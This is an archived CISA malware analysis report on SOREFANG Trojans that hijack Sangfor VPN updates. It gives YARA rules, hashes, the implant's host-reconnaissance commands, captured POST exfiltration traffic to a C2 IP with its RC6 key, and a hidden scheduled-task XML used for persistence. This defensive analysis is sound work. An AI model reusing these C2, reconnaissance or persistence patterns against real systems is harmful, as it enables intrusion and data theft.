{
	"id": "209d51df-693e-44ae-a67e-b1f128ac4337",
	"created_at": "2026-04-06T00:14:41.080079Z",
	"updated_at": "2026-04-10T13:11:59.510426Z",
	"deleted_at": null,
	"sha1_hash": "448f393460de04c59c1205a79cf61e1ee1d6909f",
	"title": "MAR-10296782-1.v1 – SOREFANG | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 101055,
	"plain_text": "MAR-10296782-1.v1 – SOREFANG | CISA\r\nPublished: 2020-07-16 · Archived: 2026-04-02 10:53:56 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThe Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security\r\nAgency (CISA). This malware has been identified as SOREFANG. Advanced persistent threat (APT) groups have been\r\nidentified using this malware. For more information regarding this malware, please visit:\r\nhttps://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development\r\nThis report analyzes three unique files. The files are Trojan implants designed to exploit Sangfor Secure Sockets Layer\r\n(SSL) virtual private network (VPN) servers. 
The malware replaces the Sangfor VPN software distributed to VPN clients.\r\nWhen installed, the implants provide the remote operator total control over the infected systems.\r\nFor a downloadable copy of IOCs, see MAR-10296782-1.v1.stix.\r\nSubmitted Files (3)\r\n58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 (58d8e65976b53b77645c248bfa18c3...)\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 (65495d173e305625696051944a36a0...)\r\na4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 (a4b790ddffb3d2e6691dcacae08fb0...)\r\nIPs (2)\r\n103.216.221.19\r\n192.168.169.103\r\nFindings\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\nTags\r\nspywaretrojan\r\nDetails\r\nName 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\nSize 437760 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 c5d5cb99291fa4b2a68b5ea3ff9d9f9a\r\nSHA1 a1b5d50fe87f9c69a0e4da447f8d56155ce59e47\r\nSHA256 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 1 of 19\n\nSHA512 1f8e1ad6e910bdf3b251ffbb81b115233eb15be725d420139ba2af4f82009a655856e39bcb4d111b7bd1f135025f73d3eab1f32d1469f0679\r\nssdeep 6144:ifY8W87LY6I0sl/myJy3FkwTCIoo4ECxAO7BjqxNuC:iAV+sl/mey3FnChxCuC\r\nEntropy 6.205690\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.Wacatac\r\nCyren W32/Trojan.ZYGO-1305\r\nESET a variant of Win32/Spy.Agent.PXZ trojan\r\nIkarus Trojan-Spy.Agent\r\nK7 Spyware ( 0056414e1 )\r\nQuick Heal Trojan.Agentb\r\nTrendMicro TrojanS.6BD050DD\r\nTrendMicro House Call TrojanS.6BD050DD\r\nVirusBlokAda Trojan.Agentb\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess 
implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 2 of 19\n\nMD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = 
\"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 3 of 19\n\n$24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 
}\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-28 07:37:41-04:00\r\nImport Hash de67eebbdb41eb69bfdf6c23a6479582\r\nCompany Name Sangfor Technologies Co.,Ltd\r\nFile Description SangforUD\r\nInternal Name SangforUD.exe\r\nLegal Copyright Copyright (C) 2015\r\nOriginal Filename SangforUD.EXE\r\nProduct Name SangforUD application\r\nProduct Version 7.6.0.100\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n79b491fc5059891654fc228b26171f6d header 1024 3.067812\r\n471b9d4a35e5f8b569ae1ca6bc91aba1 .text 240128 6.589660\r\nd74b8d761debb3939c3878052199ffa2 .rdata 74240 5.586653\r\n463a4a2ba2e9496201b711302c4e3008 .data 5120 3.612142\r\n1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393\r\ne9edb21c8ad50896cd623d0172835e6d .rsrc 103936 3.885868\r\n1d7b5cd8dcec22299f23bb463562815a .reloc 12800 6.559632\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n65495d173e... Connected_To 103.216.221.19\r\nDescription\r\nThis application is a malicious 32-bit Windows executable. The executable exploits a vulnerability identified within Sangfor\r\nSSL VPN devices. The vulnerability can be leveraged to gain control over systems because the VPN clients do not properly\r\nverify the integrity of software updates. The malware exploits this vulnerability by replacing software update binaries on\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 4 of 19\n\ncompromised VPN servers. 
The malicious binaries are then delivered and executed on the VPN clients reporting to the\r\ninfected VPN server.\r\nDuring runtime, the malware immediately attempts to clear all files from the directories \"\\\\Sangfor\\\\SSL\\\\Log\\\\\" and\r\n\"\\\\Sangfor\\\\SSL\\\\Dump\\\\”. This is an anti-forensic step: on-device Sangfor logs cannot be relied upon after infection, so\r\nresponders should look to off-host log copies where they exist.\r\nThe malware then attempts to install itself as the file \"\\\\Sangfor\\\\SSL\\\\SanforUPD.exe”. Presumably this makes the binary\r\nthe first update executable that is served out as an application update to targeted Sangfor VPN clients.\r\nNext, it checks for the presence of a file named \"\\\\Sangfor\\\\SSL\\\\.SangforUD.sum”. If this file is not present, the malware\r\nwill collect information from the infected system, using the following commands:\r\n—Begin Information Collection Commands—\r\nsysteminfo.exe\r\nipconfig.exe /all\r\ncmd.exe /c set\r\nnet.exe user\r\nHOSTNAME.EXE\r\nnet.exe user /domain\r\nnet.exe group /domain\r\ntasklist.exe /V\r\nwhoami.exe /all\r\n—End Information Collection Commands—\r\nIt will also enumerate folders on disk. The collected system information and the result of the file enumerations are stored in\r\na buffer in system memory. The malware collected the following information during analysis:\r\n—Begin Information Collected—\r\nUser information (user name and SID)\r\nGroup information (Group name, type, SID, and attributes)\r\nPrivileges information (Privilege name, description, state (disabled, enabled, N/A))\r\n—End Information Collected—\r\nThis data will next be encrypted, encoded, and then transmitted to the command and control (C2) server Internet Protocol\r\n(IP) address 103.216.221.19.\r\nThe data sent to the C2 server is encrypted utilizing a Rivest cipher 6 (RC6) cryptographic algorithm. The key used to\r\nencrypt the outbound data is dynamically generated during each C2 session. The RC6 key is appended to the outbound data\r\nso the remote operator will be able to decrypt the incoming data. 
The RC6 key can be found within the “filename” field of\r\nthe C2 outbound data. For example, in the following example (partial) transmission the RC6 key\r\nd4908a2e47ff25c44054f8e623426243 can be utilized to decrypt the C2 data. Because the per-session key is carried in the\r\nsame request, the RC6 layer provides no confidentiality against anyone holding a capture of the POST; both the key and the\r\nplaintext can be recovered from the traffic itself.\r\n—Begin Partial C2 Transmission—\r\nPOST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----974767299852498929531610575\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\nHost: 103.216.221.19\r\nContent-Length: 38886\r\nCache-Control: no-cache\r\n------974767299852498929531610575\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 5 of 19\n\nContent-Disposition: form-data; name=\"_ga\"; filename=\"d4908a2e47ff25c44054f8e623426243\"\r\nContent-Type: application/octet-stream\r\ncktTaQTE2ed BUVZaeg tMkXS 5YrSj6zdDKXYl2v LQCi85ZruMOUmkSLpc0f Tychyjhpo9fJHt5EIQw, ZREaS.\r\n3s4al2OGFMBkiqrDsN, EMfzzmDWPGoATf, oM3n kvApOjc85g1jx qACIwvhAC3lz3jTb3p6D, YI2gZ63Wpob9Bm88\r\ngZIqfg6h. ohjr ecwax41ACb9Bm8khPfh hO0Aku, VqtXhmDmOTUen 019HaS6Wmy639Km ttKwx62W2EIw.\r\nvhAC3kKL, zp3Gg CQdqXRmDmOTWe1n0IZD, EEVytbV4Zg5jk1Hp9Nf, R2kuvB06xoA. kHazjW0VlmP7J KUxnye\r\n—End Partial C2 Transmission—\r\nThe encrypted C2 traffic is encoded with a slightly modified Base64 algorithm. The encoded data appears to match Base64\r\nencoded data except there are spaces (0x20) in between parts of the data; the captured samples above also show commas and\r\nperiods interspersed in the same way, so a decoder should strip those separators as well before decoding. 
An example of this is illustrated below where the\r\nfirst 32 bytes of the outbound data are replaced with the American Standard Code for Information Interchange (ASCII) bytes\r\n“x”.\r\n—Begin Base64 Modification—\r\nPOST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----974767299852498929531610575\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\nHost: 103.216.221.19\r\nContent-Length: 24307\r\nCache-Control: no-cache\r\n------974767299852498929531610575\r\nContent-Disposition: form-data; name=\"_ga\"; filename=\"7e061a180fa24eb5a318d6eae8797cc2\"\r\nContent-Type: application/octet-stream\r\neHh4eH h4eHh4eHh4eHh4eHh4eH h4eHh4eH h4eHh4eHhB6e, RwoJe. cqpDFRSyMwBqaG4 INaFZG9zm2\r\nA7siND60oM4QhhCrf oAiAvC OUMq3, W1ZlPGq kKhkRkwjNYu1dc6. bUmU8ashTA Q8KSyp2xCnA m3A24PU\r\n6KLQqzPsMiMmEZ9A, EQF4. Ryhld1t WZTxqZCoZEZMKzA6gq TaENSD6e6Izy9Caj6 W3Z9jNkB1\r\n7tQpuEnU266hhaEc 4WwEPCkssdCs4GF. MoVXhKQHl6C aj4t8u6I ueaakH1 60jPL 0JqH1 bdn2M.\r\n2QHWcgYUyhVeEqhj6I Pu6ANJXvs, zSvNsUXthp5NIDV0i\r\n—End Base64 Modification—\r\nAs illustrated, it appears exactly like the Base64 output of encoding the ASCII bytes “x” with the exception of the periodic\r\nspaces within the encoded data.\r\nThe malware will attempt to query its remote C2 server every 900000 milliseconds (15 minutes) with the POST request containing\r\nencrypted information about the victim system, each time querying the server for 260 bytes of data and searching it for the\r\nvalue “200” to ensure the data was received successfully, and the remote C2 server is alive (Figure 1).\r\nIf the malware is able to successfully pass and receive data from its C2 server, it will then generate 32 bytes of data and\r\nrecord the data into a file named \"\\\\Sangfor\\\\SSL\\\\.SangforUD.sum”.\r\nThe malware will then enter a loop in which it attempts to download payloads from its C2 server every 900000 milliseconds\r\n(15 minutes).\r\nThe 32 bytes of data contained within the newly created file “.SangforUD.sum” 
will be contained within these connections to\r\nthe malware’s C2 server.\r\nIt is not known what the C2 server does with this 32-byte value, however the malware only creates this 32-byte value and\r\nwrites it to the file “.SangforUD.sum” once, which suggests the 32-byte value is a unique identifier for each compromised\r\nVPN server.\r\nEach payload downloaded from the C2 server will be immediately Base64 decoded, RC6 decrypted, executed using\r\nCreateProcessW, and then copied to the system as \"\\\\Sangfor\\\\SSL\\\\SangforUDC.exe\".\r\nIn addition, the malware decrypts the following Extensible Markup Language (XML) data indicating it uses scheduled tasks\r\nto attain persistence on a target Windows system. Note that the task URI in the decrypted data is the misspelled\r\n\"SangforUpade\" and the Author string is \"Sangfor Technologies Co.,Ltd\"; a scheduled task with that name is a usable\r\nhunting indicator. This data is decrypted using the RC6 algorithm with the key:\r\n2B6233EB3E872FF78988F4A8F3F6A3BA.\r\n—Begin Decrypted XML Task Data—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 6 of 19\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n\u003cRegistrationInfo\u003e\r\n\u003cDate\u003e2019-07-16T06:00:28.6871947\u003c/Date\u003e\r\n\u003cAuthor\u003eSangfor Technologies Co.,Ltd\u003c/Author\u003e\r\n\u003cURI\u003eSangforUpade\u003c/URI\u003e\r\n\u003c/RegistrationInfo\u003e\r\n\u003cTriggers\u003e\r\n\u003cCalendarTrigger\u003e\r\n\u003cRepetition\u003e\r\n\u003cInterval\u003eP1D\u003c/Interval\u003e\r\n\u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n\u003c/Repetition\u003e\r\n\u003cStartBoundary\u003e2019-07-16T00:00:00\u003c/StartBoundary\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003cScheduleByDay\u003e\r\n\u003cDaysInterval\u003e1\u003c/DaysInterval\u003e\r\n\u003c/ScheduleByDay\u003e\r\n\u003c/CalendarTrigger\u003e\r\n\u003c/Triggers\u003e\r\n\u003cSettings\u003e\r\n\u003cMultipleInstancesPolicy\u003eParallel\u003c/MultipleInstancesPolicy\u003e\r\n\u003c
DisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n\u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n\u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n\u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n\u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n\u003cIdleSettings\u003e\r\n\u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n\u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n\u003c/IdleSettings\u003e\r\n\u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n\u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n\u003cHidden\u003etrue\u003c/Hidden\u003e\r\n\u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n\u003cDisallowStartOnRemoteAppSession\u003efalse\u003c/DisallowStartOnRemoteAppSession\u003e\r\n\u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n\u003cWakeToRun\u003etrue\u003c/WakeToRun\u003e\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 7 of 19\n\n\u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n\u003cPriority\u003e7\u003c/Priority\u003e\r\n\u003cRestartOnFailure\u003e\r\n\u003cInterval\u003ePT1M\u003c/Interval\u003e\r\n\u003cCount\u003e3\u003c/Count\u003e\r\n\u003c/RestartOnFailure\u003e\r\n\u003c/Settings\u003e\r\n\u003cActions Context = \"Author\"\u003e\r\n\u003cExec\u003e\r\n\u003cCommand\u003e\u003c/Command\u003e\r\n\u003c/Exec\u003e\r\n\u003c/Actions\u003e\r\n—End Decrypted XML Task Data—\r\nNote: the task is marked Hidden and its Exec Command element is empty in the decrypted data, so the executable path is\r\npresumably populated at runtime; this is not shown in the report.\r\nScreenshots\r\nFigure 1 - Screenshot of the connection to the C2 server when attempting to download an RC6-encrypted executable\r\npayload. Note: the unique identifier is within the \"_ga=\" field.\r\nFigure 2 - Screenshot of the malware querying the C2 server after conducting the initial connection. 
The initial connection\r\nwill pass information stolen from the target system to the C2 server, including a unique hash used as a victim system\r\nidentifier. After a successful initial connection with the C2, the malware will begin attempting to download RC6 executable\r\npayloads.\r\nFigure 3 - Screenshot of the initialization function for the RC6 algorithm contained in the malware.\r\n103.216.221.19\r\nTags\r\ncommand-and-control\r\nHTTP Sessions\r\nPOST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----974767299852498929531610575\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\nHost: 103.216.221.19\r\nContent-Length: 38886\r\nCache-Control: no-cache\r\nWhois\r\nQueried whois.apnic.net with \"103.216.221.19\"...\r\n% Information related to '103.216.220.0 - 103.216.223.255'\r\n% Abuse contact for '103.216.220.0 - 103.216.223.255' is 'abuse@hostuniversal.com.au'\r\ninetnum:        103.216.220.0 - 103.216.223.255\r\nnetname:        HOST-AU\r\ndescr:         Host Universal Pty Ltd\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 8 of 19\n\ncountry:        AU\r\norg:            ORG-HUPL1-AP\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nabuse-c:        AH892-AP\r\nstatus:         ALLOCATED PORTABLE\r\nremarks:        --------------------------------------------------------\r\nremarks:        To report network abuse, please contact mnt-irt\r\nremarks:        For troubleshooting, please contact tech-c and admin-c\r\nremarks:        Report invalid contact via www.apnic.net/invalidcontact\r\nremarks:        --------------------------------------------------------\r\nmnt-by:         APNIC-HM\r\nmnt-lower:     MAINT-HOST-AU\r\nmnt-routes:     MAINT-HOST-AU\r\nmnt-irt:        IRT-HOST-AU\r\nlast-modified: 2020-06-10T13:06:06Z\r\nsource:         APNIC\r\nirt:            IRT-HOST-AU\r\naddress:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, 
Hindmarsh So\r\ne-mail:         abuse@hostuniversal.com.au\r\nabuse-mailbox: abuse@hostuniversal.com.au\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nauth:         # Filtered\r\nremarks:        abuse@hostuniversal.com.au was validated on 2020-06-25\r\nmnt-by:         MAINT-HOST-AU\r\nlast-modified: 2020-06-25T16:58:38Z\r\nsource:         APNIC\r\norganisation: ORG-HUPL1-AP\r\norg-name:     Host Universal Pty Ltd\r\ncountry:        AU\r\naddress:        Host Universal Pty Ltd\r\naddress:        c/o Brentnalls SA\r\naddress:        255 Port Road, Hindmarsh SA 5007, Australia\r\nphone:         +61403394019\r\ne-mail:         abuse@hostuniversal.com.au\r\nmnt-ref:        APNIC-HM\r\nmnt-by:         APNIC-HM\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 9 of 19\n\nlast-modified: 2018-03-20T12:57:09Z\r\nsource:         APNIC\r\nrole:         ABUSE HOSTAU\r\naddress:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So\r\ncountry:        ZZ\r\nphone:         +000000000\r\ne-mail:         abuse@hostuniversal.com.au\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nnic-hdl:        AH892-AP\r\nremarks:        Generated from irt object IRT-HOST-AU\r\nabuse-mailbox: abuse@hostuniversal.com.au\r\nmnt-by:         APNIC-ABUSE\r\nlast-modified: 2020-06-10T13:06:05Z\r\nsource:         APNIC\r\nrole:         Host Universal Pty Ltd administrator\r\naddress:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So\r\ncountry:        AU\r\nphone:         +61403394019\r\nfax-no:         +61403394019\r\ne-mail:         abuse@hostuniversal.com.au\r\nadmin-c:        HUPL1-AP\r\ntech-c:         HUPL1-AP\r\nnic-hdl:        HUPL1-AP\r\nmnt-by:         MAINT-HOST-AU\r\nlast-modified: 2016-05-03T06:34:59Z\r\nsource:         APNIC\r\n% Information related to '103.216.221.0/24AS136557'\r\nroute:         103.216.221.0/24\r\norigin:         
AS136557\r\ndescr:         Host Universal Pty Ltd\r\n               Host Universal Pty Ltd\r\n               c/o Brentnalls SA\r\n               255 Port Road, Hindmarsh SA 5007, Australia\r\nmnt-by:         MAINT-HOST-AU\r\nlast-modified: 2019-12-19T00:21:46Z\r\nsource:         APNIC\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 10 of 19\n\nRelationships\r\n103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\n103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nDescription\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 and\r\n58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 attempt to connect to the IP address.\r\n58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nTags\r\nspywaretrojan\r\nDetails\r\nName 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nSize 428032 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 967fcf185634def5177f74b0f703bdc0\r\nSHA1 152189b62c546d6297a7083778fba62dcec576be\r\nSHA256 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\nSHA512 184dba49900a9b7c2c170c857806bff67c2fb51bcfad672f841d8c484e0c4452a3599f237dadbd6b6eb44a5f541dd6282bee4654486f50031\r\nssdeep 6144:AC70wZI2ZhjKOYTvkh+YVSn9bEAMpNZr3qHLAONXGCSxfuMBES:/lZIpQoYVmZERH0LguMWS\r\nEntropy 6.211072\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.Wacatac\r\nESET a variant of Win32/Spy.Agent.PXZ trojan\r\nIkarus Trojan-Spy.Agent\r\nK7 Spyware ( 0056414e1 )\r\nMicrosoft Security Essentials Trojan:Win32/Skeeyah.B!rfn\r\nQuick Heal Trojan.Agentb\r\nTrendMicro TrojanS.F2D90167\r\nTrendMicro House Call TrojanS.F2D90167\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    
Last_Modified=\"20200706_1017\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 11 of 19\n\nActor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = 